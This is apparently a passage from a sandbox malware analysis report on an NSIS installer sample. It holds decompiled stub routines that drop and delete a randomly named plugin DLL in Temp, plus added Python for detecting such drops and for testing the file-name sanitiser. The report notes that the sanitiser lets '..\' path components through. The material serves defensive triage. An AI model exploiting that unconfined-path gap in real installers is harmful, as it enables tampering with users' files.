                                                                              				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
                                                                              				_t54 = E00402A9A(_t48);
                                                                              				_t23 = E00405538(_t54);
                                                                              				_push(_t54);
                                                                              				if(_t23 == 0) {
                                                                              					lstrcatA(E004054CC(E004059BF("C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll", "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                                              					_t55 = 0x40a018;
                                                                              				} else {
                                                                              					_push(0x40a018);
                                                                              					E004059BF();
                                                                              				}
                                                                              				E00405BFB(_t55);
                                                                              				_t28 = E00405690(_t55, 0x40000000, 2);
                                                                              				 *(_t60 + 8) = _t28;
                                                                              				if(_t28 != 0xffffffff) {
                                                                              					_t33 =  *0x7a2f8c;
                                                                              					 *(_t60 - 0x2c) = _t33;
                                                                              					_t53 = GlobalAlloc(0x40, _t33);
                                                                              					if(_t53 != _t48) {
                                                                              						E004030FF(_t48);
                                                                              						E004030CD(_t53,  *(_t60 - 0x2c));
                                                                              						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
                                                                              						 *(_t60 - 0x30) = _t58;
                                                                              						if(_t58 != _t48) {
                                                                              							_push( *(_t60 - 0x1c));
                                                                              							_push(_t58);
                                                                              							_push(_t48);
                                                                              							_push( *((intOrPtr*)(_t60 - 0x20)));
                                                                              							E00402EBD();
                                                                              							while( *_t58 != _t48) {
                                                                              								_t59 = _t58 + 8;
                                                                              								 *(_t60 - 0x38) =  *_t58;
                                                                              								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
                                                                              								_t58 = _t59 +  *(_t60 - 0x38);
                                                                              							}
                                                                              							GlobalFree( *(_t60 - 0x30));
                                                                              						}
                                                                              						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
                                                                              						GlobalFree(_t53);
                                                                              						_push(_t48);
                                                                              						_push(_t48);
                                                                              						_push( *(_t60 + 8));
                                                                              						_push(0xffffffff);
                                                                              						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
                                                                              					}
                                                                              					CloseHandle( *(_t60 + 8));
                                                                              					_t55 = 0x40a018;
                                                                              				}
                                                                              				_t51 = 0xfffffff3;
                                                                              				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
                                                                              					_t51 = 0xffffffef;
                                                                              					DeleteFileA(_t55);
                                                                              					 *((intOrPtr*)(_t60 - 4)) = 1;
                                                                              				}
                                                                              				_push(_t51);
                                                                              				E00401428();
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                                              • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                                              • GlobalFree.KERNEL32 ref: 004027C6
                                                                              • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                                              • GlobalFree.KERNEL32 ref: 004027DF
                                                                              • CloseHandle.KERNEL32(?), ref: 004027F7
                                                                              • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                                                                • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                              • API String ID: 3508600917-1998957182
                                                                              • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                              • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                                                              • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                              • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
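                                                                               The API trace of this routine shows the stub building the path C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll, writing the plugin DLL into it (GlobalAlloc, WriteFile, CloseHandle) and deleting it again with DeleteFileA once the plugin has been used. The Python below is an added example for triaging that behaviour in file-event telemetry; it is not code from the report, from the sample or from NSIS. It generalises the observed directory name to the NSIS scheme ns<letter><hex digits>.tmp, pairs the create and delete events per process, and separates drops of a known NSIS plugin from drops of an arbitrarily named DLL such as 6oxdti6l9qd.dll. The record format, process ids, timestamps and the allowlist of plugin names are assumptions made for the example.

```python
"""Flag NSIS-style plugin DLL drops in file-event records (added example)."""
import re

# NSIS extracts plugins into %TEMP%\ns<letter><hex>.tmp\<plugin>.dll for the
# duration of one run; the sample used ...\Temp\nsvE792.tmp\6oxdti6l9qd.dll.
# The letter and the hex digits change per run, so the pattern generalises
# the observed name rather than matching it literally.
NSIS_PLUGIN_PATH = re.compile(
    r"\\Temp\\ns[a-z][0-9a-f]{1,4}\.tmp\\(?P<name>[^\\]+\.dll)$", re.IGNORECASE)

# Assumption: a partial allowlist of plugins that ship with NSIS or are common
# in legitimate installers. A drop that is not on it is worth a closer look.
KNOWN_PLUGINS = {
    "system.dll", "nsexec.dll", "installoptions.dll", "nsdialogs.dll",
    "startmenu.dll", "langdll.dll", "userinfo.dll", "inetc.dll", "nsisdl.dll",
}

# Constructed records in the format ts|pid|image|op|path (not real telemetry).
SAMPLE_EVENTS = [
    r"2021-04-06T10:00:01|1234|C:\Users\user\Desktop\NdBLyH2h5d.exe|FileCreate|C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll",
    r"2021-04-06T10:00:02|1234|C:\Users\user\Desktop\NdBLyH2h5d.exe|FileDelete|C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll",
    r"2021-04-06T10:05:00|5678|C:\Users\user\Downloads\setup.exe|FileCreate|C:\Users\user\AppData\Local\Temp\nsa1B2C.tmp\System.dll",
    r"2021-04-06T10:05:01|1234|C:\Users\user\Desktop\NdBLyH2h5d.exe|FileCreate|C:\Users\user\AppData\Local\Temp\other.tmp\x.dll",
]


def parse_event(line):
    """Split one ts|pid|image|op|path record into a dict."""
    ts, pid, image, op, path = line.rstrip("\n").split("|", 4)
    return {"ts": ts, "pid": int(pid), "image": image, "op": op, "path": path}


def find_plugin_drops(lines):
    """Return one finding per (pid, path) that matches the NSIS plugin layout.

    Each finding records whether the DLL was written, whether the same process
    deleted it afterwards (the write-call-delete sequence seen in the trace),
    and whether the file name is a known NSIS plugin. Severity is a heuristic
    for triage: a written DLL with an unknown name ranks "high", anything
    else "info".
    """
    drops = {}
    for ev in map(parse_event, lines):
        m = NSIS_PLUGIN_PATH.search(ev["path"])
        if not m:
            continue
        key = (ev["pid"], ev["path"].lower())
        f = drops.setdefault(key, {
            "pid": ev["pid"], "image": ev["image"], "path": ev["path"],
            "plugin": m.group("name").lower(), "written": False, "deleted": False,
        })
        if ev["op"] == "FileCreate":
            f["written"] = True
        elif ev["op"] == "FileDelete":
            f["deleted"] = True
    findings = []
    for f in drops.values():
        f["known_plugin"] = f["plugin"] in KNOWN_PLUGINS
        f["severity"] = "high" if f["written"] and not f["known_plugin"] else "info"
        findings.append(f)
    return findings


if __name__ == "__main__":
    for f in find_plugin_drops(SAMPLE_EVENTS):
        print(f["severity"], f["pid"], f["plugin"], "deleted" if f["deleted"] else "kept")
```

Every NSIS installer, benign or not, produces the same create-then-delete sequence for its plugins, so the pattern on its own is a hunting pivot rather than a verdict; what sets this sample apart from an installer that drops System.dll is the random plugin name, which is why the example keys its severity on the allowlist.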

                                                                               C-Code - Quality: 94%
                                                                               			// Status-line update routine of the NSIS stub (corresponds to update_status_text in the NSIS exehead).
                                                                               			// _a4: string-table index of the base line, _a8: text to append (or 0). The text lives in a 0x800-byte
                                                                               			// buffer at 0x79ed60; the flag at 0x4092a0 selects what gets refreshed: 0x1 = reuse the last ListView
                                                                               			// line, 0x2 = update the details ListView, 0x4 = mirror the text into the window title.
                                                                               			// Trailing // 0x........ comments give the instruction address of each statement.
                                                                               			E00404D62(CHAR* _a4, CHAR* _a8) {
                                                                               				struct HWND__* _v8;                                // details ListView (global handle at 0x7a2764)
                                                                               				signed int _v12;                                   // copy of the update flag
                                                                               				CHAR* _v32;                                        // LVITEM.pszText (the LVITEM starts at _v52)
                                                                               				long _v44;                                         // LVITEM.iSubItem
                                                                               				int _v48;                                          // LVITEM.iItem
                                                                               				void* _v52;                                        // LVITEM.mask
                                                                               				void* __ebx;
                                                                               				void* __edi;
                                                                               				void* __esi;
                                                                               				CHAR* _t26;
                                                                               				signed int _t27;
                                                                               				CHAR* _t28;
                                                                               				long _t29;
                                                                               				signed int _t39;
                                                                               
                                                                               				_t26 =  *0x7a2764;                                 // 0x00404d68
                                                                               				_v8 = _t26;                                        // 0x00404d74
                                                                               				if(_t26 != 0) {                                    // 0x00404d77  nothing to do without a details ListView
                                                                               					_t27 =  *0x4092a0; // 0x6                          // 0x00404d7d  value at dump time: 0x2 | 0x4
                                                                               					_v12 = _t27;                                       // 0x00404d89
                                                                               					_t39 = _t27 & 0x00000001;                          // 0x00404d8c
                                                                               					if(_t39 == 0) {                                    // 0x00404d8f
                                                                               						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);       // 0x00404d95  load string-table entry _a4 into the text buffer
                                                                               					}                                                  // 0x00404d95
                                                                               					_t26 = lstrlenA(0x79ed60);                         // 0x00404d9b
                                                                               					_a4 = _t26;                                        // 0x00404da3  _a4 now holds the current buffer length
                                                                               					if(_a8 == 0) {                                     // 0x00404da6
                                                                               						L6:                                                // 0x00404dc3
                                                                               						if((_v12 & 0x00000004) != 0) {                     // 0x00404dc7
                                                                               							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);       // 0x00404dd0  mirror the text into the window title
                                                                               						}                                                  // 0x00404dd0
                                                                               						if((_v12 & 0x00000002) != 0) {                     // 0x00404dda
                                                                               							_v32 = 0x79ed60;                                   // 0x00404de3  LVITEM.pszText
                                                                               							_v52 = 1;                                          // 0x00404def  LVITEM.mask = LVIF_TEXT
                                                                               							_t29 = SendMessageA(_v8, 0x1004, 0, 0);            // 0x00404df6  LVM_GETITEMCOUNT
                                                                               							_v44 = 0;                                          // 0x00404dfa  LVITEM.iSubItem
                                                                               							_v48 = _t29 - _t39;                                // 0x00404dfd  LVITEM.iItem: last line if flag 0x1, else one past the end
                                                                               							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);       // 0x00404e10  LVM_INSERTITEMA (0x1007) or, with flag 0x1, LVM_SETITEMA (0x1006)
                                                                               							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);         // 0x00404e1e  LVM_ENSUREVISIBLE
                                                                               						}                                                  // 0x00404e1e
                                                                               						if(_t39 != 0) {                                    // 0x00404e22
                                                                               							_t28 = _a4;                                        // 0x00404e24
                                                                               							 *((char*)(_t28 + 0x79ed60)) = 0;                  // 0x00404e27  flag 0x1: cut the appended text off again, keeping the base line
                                                                               							return _t28;
                                                                               						}                                                  // 0x00404e27
                                                                               					} else {                                           // 0x00404da8
                                                                               						_t26 =  &(_a4[lstrlenA(_a8)]);                     // 0x00404db0  current length + length of the text to append
                                                                               						if(_t26 < 0x800) {                                 // 0x00404db8  bounds check against the 0x800-byte buffer; an oversized append is dropped silently
                                                                               							_t26 = lstrcatA(0x79ed60, _a8);                    // 0x00404dbe
                                                                               							goto L6;
                                                                               						}                                                  // 0x00404dbe
                                                                               					}                                                  // 0x00404db8
                                                                               				}                                                  // 0x00404da6
                                                                               				return _t26;                                       // 0x00404e31
                                                                               			}

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                              • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                              • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                              • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID: `y
                                                                              • API String ID: 2531174081-1740403070
                                                                              • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                              • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                                                              • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                              • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                               C-Code - Quality: 100%
                                                                               			// File-name sanitiser of the NSIS stub (corresponds to validate_filename in the NSIS exehead); the caller
                                                                               			// references the "Error writing temporary file..." string, i.e. this runs on names used for temp files.
                                                                               			// It edits the buffer in place: a leading "\\?\" and a drive or UNC prefix are skipped but kept, every
                                                                               			// control character and every character in "*?|<>/\":" is removed from the rest, and trailing spaces and
                                                                               			// backslashes are cut. Backslashes and dots inside the name pass through, so the filter only governs
                                                                               			// which characters may appear, not which directories the name points into.
                                                                               			// Trailing // 0x........ comments give the instruction address of each statement.
                                                                               			E00405BFB(CHAR* _a4) {
                                                                               				char _t5;
                                                                               				char _t7;
                                                                               				char* _t15;                                        // start of the filtered part (after the kept prefix)
                                                                               				char* _t16;                                        // write cursor
                                                                               				CHAR* _t17;                                        // read cursor
                                                                               
                                                                               				_t17 = _a4;                                        // 0x00405bfd
                                                                               				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) { // 0x00405c05  skip a leading "\\?\"
                                                                               					_t17 =  &(_t17[4]);                                // 0x00405c19
                                                                               				}                                                  // 0x00405c19
                                                                               				if( *_t17 != 0 && E00405538(_t17) != 0) {          // 0x00405c1f  E00405538 reports a drive spec ("X:") or UNC prefix ("\\"); those two characters stay as they are
                                                                               					_t17 =  &(_t17[2]);                                // 0x00405c2c
                                                                               				}                                                  // 0x00405c2c
                                                                               				_t5 =  *_t17;                                      // 0x00405c2d
                                                                               				_t15 = _t17;                                       // 0x00405c2f
                                                                               				_t16 = _t17;                                       // 0x00405c33
                                                                               				if(_t5 != 0) {                                     // 0x00405c35
                                                                               					do {                                               // 0x00405c3e
                                                                               						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) { // 0x00405c40  keep the character only if it is no control character (the NSIS source compares as unsigned char; the decompiler's char type hides the signedness) and E004054F7 does not find it in "*?|<>/\":" (it returns a pointer to the terminator when absent)
                                                                               							E00405670(_t16, _t17, CharNextA(_t17) - _t17);     // 0x00405c5a  copy the character (1 byte, 2 for a DBCS pair) to the write cursor
                                                                               							_t16 = CharNextA(_t16);                            // 0x00405c62
                                                                               						}                                                  // 0x00405c62
                                                                               						_t17 = CharNextA(_t17);                            // 0x00405c67
                                                                               						_t5 =  *_t17;                                      // 0x00405c69
                                                                               					} while (_t5 != 0);                                // 0x00405c6b
                                                                               				}                                                  // 0x00405c6f
                                                                               				 *_t16 =  *_t16 & 0x00000000;                      // 0x00405c70  terminate the filtered string
                                                                               				while(1) {                                         // 0x00405c73  strip trailing spaces and backslashes, never moving before _t15
                                                                               					_t16 = CharPrevA(_t15, _t16);                      // 0x00405c7b
                                                                               					_t7 =  *_t16;                                      // 0x00405c7d
                                                                               					if(_t7 != 0x20 && _t7 != 0x5c) {                   // 0x00405c81
                                                                               						break;
                                                                               					}
                                                                               					 *_t16 =  *_t16 & 0x00000000;                      // 0x00405c87
                                                                               					if(_t15 < _t16) {                                  // 0x00405c8c
                                                                               						continue;
                                                                               					}
                                                                               					break;
                                                                               				}                                                  // 0x00405c8c
                                                                               				return _t7;                                        // 0x00405c91
                                                                               			}

                                                                              APIs
                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                              • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                              • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                              • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                              Strings
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                                                              • *?|<>/":, xrefs: 00405C43
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                               • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                              • API String ID: 589700163-489697304
                                                                              • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                              • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                                                              • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                              • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
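                                                                               The routine above is worth being able to reproduce on the desk, because it decides which characters of a temp-file name the stub keeps. The Python below is an added example, not the stub's code and not taken from NSIS: it ports the decompiled loop so that the kept prefixes, the removed characters and the trailing trim can be checked on arbitrary input. It assumes that E00405538 is the NSIS drive/UNC check (the listing only shows that a true result skips two characters), that the > 0x1f comparison is unsigned as in the NSIS source, and that one code point stands for one character where the stub walks the ANSI buffer with CharNextA/CharPrevA. The last two cases in the demo go a step beyond the listing by showing that an alternate-data-stream colon is dropped while "..\" components survive.

```python
"""Pure-Python port of the decompiled file-name sanitiser (added example)."""

# The string referenced at 0x00405C43.
FORBIDDEN = set('*?|<>/":')


def _valid_path_spec(s):
    """True for a UNC prefix ("\\\\") or a drive spec ("X:").

    Assumption: this is what E00405538 checks; the listing only shows that a
    non-zero result makes the caller keep the first two characters untouched.
    """
    if len(s) < 2:
        return False
    drive_letter = ord(s[0]) | 0x20            # fold to lower case before the range test
    return (s[0] == "\\" and s[1] == "\\") or (0x61 <= drive_letter <= 0x7A and s[1] == ":")


def validate_filename(path):
    """Return the name as the stub would leave it in its buffer.

    The stub edits in place: a leading "\\\\?\\" and a drive/UNC prefix are
    skipped by the read cursor but remain in the buffer, only the remainder
    is filtered. Characters <= 0x1F (assumed to be compared unsigned, as in
    the NSIS source) and characters in FORBIDDEN are dropped, then trailing
    spaces and backslashes are removed without ever touching the prefix.
    Assumption: each code point is one character (CharNextA/CharPrevA would
    additionally keep a DBCS lead/trail byte pair together).
    """
    prefix, rest = "", path
    if rest.startswith("\\\\?\\"):
        prefix, rest = rest[:4], rest[4:]
    if rest and _valid_path_spec(rest):
        prefix, rest = prefix + rest[:2], rest[2:]
    kept = "".join(c for c in rest if ord(c) > 0x1F and c not in FORBIDDEN)
    return prefix + kept.rstrip(" \\")


if __name__ == "__main__":
    # Constructed inputs; the observed plugin path appears only as a shape here.
    for sample in (
        r'\\?\C:\Temp\ns?.tmp\"plug in".dll  \\',
        "C:\\evil:stream.txt",
        "\\\\srv\\share\\a<b>.dll",
        "name.txt \\ \\",
        "..\\up.dll",
    ):
        print(repr(sample), "->", repr(validate_filename(sample)))
```

Two things the port makes visible that the listing does not spell out: the colon is stripped everywhere except in the drive spec, so an alternate-data-stream suffix cannot be smuggled through, while backslash and dot are not in the forbidden set, so directory components including "..\" pass through unchanged and any confinement to %TEMP% has to come from the caller, not from this routine.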

                                                                               C-Code - Quality: 100%
                                                                               			// Control-colour handler of the NSIS stub (corresponds to _HandleStaticBkColor in the NSIS exehead).
                                                                               			// _a4: uMsg, _a8: the HDC passed in wParam, _a12: the control HWND passed in lParam. The per-control
                                                                               			// colour record is read from the control's GWL_USERDATA: [0] text colour, [1] background colour,
                                                                               			// [2] lbStyle, [3] brush handle, [4] background mode, [5] flags (0x1 set text colour, 0x2 text colour
                                                                               			// is a COLOR_* system index, 0x4 set background colour, 0x8 background colour is a system index,
                                                                               			// 0x10 return a custom brush).
                                                                               			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                               				struct tagLOGBRUSH _v16;
                                                                               				long _t35;
                                                                               				long _t37;
                                                                               				void* _t40;
                                                                               				long* _t49;                                        // colour record of the control
                                                                               
                                                                               				if(_a4 + 0xfffffecd > 5) {                         // only WM_CTLCOLOREDIT (0x133) .. WM_CTLCOLORSTATIC (0x138) are handled
                                                                               					L15:
                                                                               					return 0;
                                                                               				}
                                                                               				_t49 = GetWindowLongA(_a12, 0xffffffeb);           // GWL_USERDATA (-21)
                                                                               				if(_t49 == 0) {
                                                                               					goto L15;                                          // control has no colour record: default handling
                                                                               				}
                                                                               				_t35 =  *_t49;
                                                                               				if((_t49[5] & 0x00000002) != 0) {                  // flag 0x2: resolve the system colour index
                                                                               					_t35 = GetSysColor(_t35);
                                                                               				}
                                                                               				if((_t49[5] & 0x00000001) != 0) {                  // flag 0x1
                                                                               					SetTextColor(_a8, _t35);
                                                                               				}
                                                                               				SetBkMode(_a8, _t49[4]);
                                                                               				_t37 = _t49[1];
                                                                               				_v16.lbColor = _t37;
                                                                               				if((_t49[5] & 0x00000008) != 0) {                  // flag 0x8: resolve the system colour index
                                                                               					_t37 = GetSysColor(_t37);
                                                                               					_v16.lbColor = _t37;
                                                                               				}
                                                                               				if((_t49[5] & 0x00000004) != 0) {                  // flag 0x4
                                                                               					SetBkColor(_a8, _t37);
                                                                               				}
                                                                               				if((_t49[5] & 0x00000010) != 0) {                  // flag 0x10: build the brush described by lbStyle / brush handle
                                                                              					_v16.lbStyle = _t49[2];
                                                                              					_t40 = _t49[3];
                                                                              					if(_t40 != 0) {
                                                                              						DeleteObject(_t40);
                                                                              					}
                                                                              					_t49[3] = CreateBrushIndirect( &_v16);
                                                                              				}
                                                                              				return _t49[3];
                                                                              			}

                                                                              APIs
                                                                              Memory Dump Source
• Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                              • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                                                              • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                              • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 78%
/* Analyst note (inferred from the API sequence and the NSIS Error string in the subcall, not from the report):
   an installer "rename file" instruction. Two string parameters are resolved, the file is moved with
   MoveFileA, and if that fails (and the source exists) the rename is deferred via wininit.ini. */
E0040166B() {
	int _t18;
	void* _t28;
	void* _t35;	/* frame pointer; decompiler could not recover the locals' names */

	*(_t35 + 8) = E00402A9A(0xffffffd0);	/* resolve source path (string index -0x30) */
	*(_t35 - 8) = E00402A9A(0xffffffdf);	/* resolve destination path (string index -0x21) */
	E004059BF(0x40a018,  *(_t35 + 8));	/* lstrcpyn source path into the 1 KiB log buffer at 0x40a018 */
	_t18 = lstrlenA( *(_t35 - 8));
	/* only build the "src -> dst" log string if it fits the buffer (< 0x3fd = 1021 chars) */
